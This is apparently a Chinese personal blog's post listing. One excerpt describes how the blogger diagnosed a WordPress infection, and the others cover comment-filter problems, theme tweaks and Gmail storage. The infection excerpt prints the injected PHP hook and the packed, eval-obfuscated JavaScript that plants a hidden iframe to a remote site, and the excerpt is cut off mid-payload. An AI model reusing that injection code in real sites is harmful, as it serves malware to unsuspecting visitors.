落园专注经济视角下的互联网 / Economic Observation of the Internet

最近两个blog都不消停，总有木马嵌入的报告。是可忍孰不可忍，在今早收到google Webmaster的通知之后，决定彻底的查一下这个感染的原因。 登上FTP，看到wp-settings.php这个文件更新日期和其他的都不一样，就下下他来。然后和标准的安装包自带的wp-settings.php进行比对，果然发现多了这么几行： function check_wordpress(){ $t_d = sys_get_temp_dir(); if(file_exists($t_d . '/wp_inc')){ readfile($t_d . '/wp_inc'); } } add_action('wp_head', 'check_wordpress'); 遂加了一行echo $t_d. '/wp_inc' ;，华丽丽的发现输出了一个/tmp。这个时候访问blog并查看源文件，发现有一行代码被嵌入： eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|hggf|...

查看全文

前几日Hercy学姐特意发短信给我说在落园留言留不上，我还没在意。今儿突然想起来Akismet这个插件最近有些抽风，果然去垃圾评论那里看了看，若干条有用的评论都被凄凄惨惨的过滤掉了。最诡异的就是不仅仅有新的来客，一些老主顾们也被无情的过滤掉了。像思喆大哥22号的留言我现在才看到，keelii换域名的留言也被过滤了，老饕和Calvin的留言也就那么牺牲了……真的是诡异到家了。 前几日Gmail貌似过滤也严格了起来，很多新的邮件不知为何就归到spam里面去了。害得我三天两头得去垃圾箱翻翻。没想到wordpress也来这招，而且害得我这么久才发现，真是对不住大家。 Anyway，希望大家沉得住气，继续留言，我一条一条恢复。按说只要原来有评论通过的记录，应该下次就不会被屏蔽了。这个Akismet弄的，都快成白名单了。

查看全文

昨天更新了一下PageNavi这个插件，然后发现新版本自己带了一个CSS，导致我原来在模板中定义的样式失效，这也刺激了我去好好休整一下这个四处透风的Wordpress。 +改回来页面导航的样式 +调整了前台页面的文字，把所有不适应国情的英文字符都改为中文了（分家咯）。现在留下的大概只有RSS, Tag这些不好翻译也不用翻译的个别英文了。 +调整了个别位置英文字体的样式，排除了宋体显示英文。 +调整后台目录，使得wordpress可以实现自动升级（已升级至最新版）。由于支持widgets的话对CSS文件需进行较大调整，所以暂且搁置。 +顺手升级了后花园的TextCube，其实我仍然觉得这个是不错的blog系统，不过可能更适应韩国。 -调整模板，去掉自动将半角符号转换为全角符号的函数（可能仅有中文版有此毛病）。 +更新了表情包，由“洋葱头”换成了“胖兔子粥粥”。由于GIF动画图片不足，又加了一些静态的。。 +修正了评论页的一些错误，主要是被密码保护的文章评论页模板问题。 唯一不爽的就算在中文14PX的显示下，英文字体显得很粗糙（Firefox下，可能是没有cleartype支持的缘故）。正文中的英文只能继续这么忍受着了。

查看全文

今天一登录Gmail，就看到一个红色的框框，上书：You are almost out of space for your Gmail account.随后最下面的提示也成了鲜红色：You are currently using 7046 MB (95%) of your 7390 MB. 这是我从2005年用Gmail来，第一次看到如斯的提示……我到底干啥了？5555，删东西吧……一个Filter，就都删掉了…… 壮观的清掉了一堆邮件，回到了You are currently using 1163 MB (15%) of your 7390 MB. 看来这下还是比较正常的…… 那我究竟删掉了什么东西呢？唉，不过是落园近一年的备份……啦啦啦～看来数据库文件虽不大，日积月累也是个不小的数目呢！

查看全文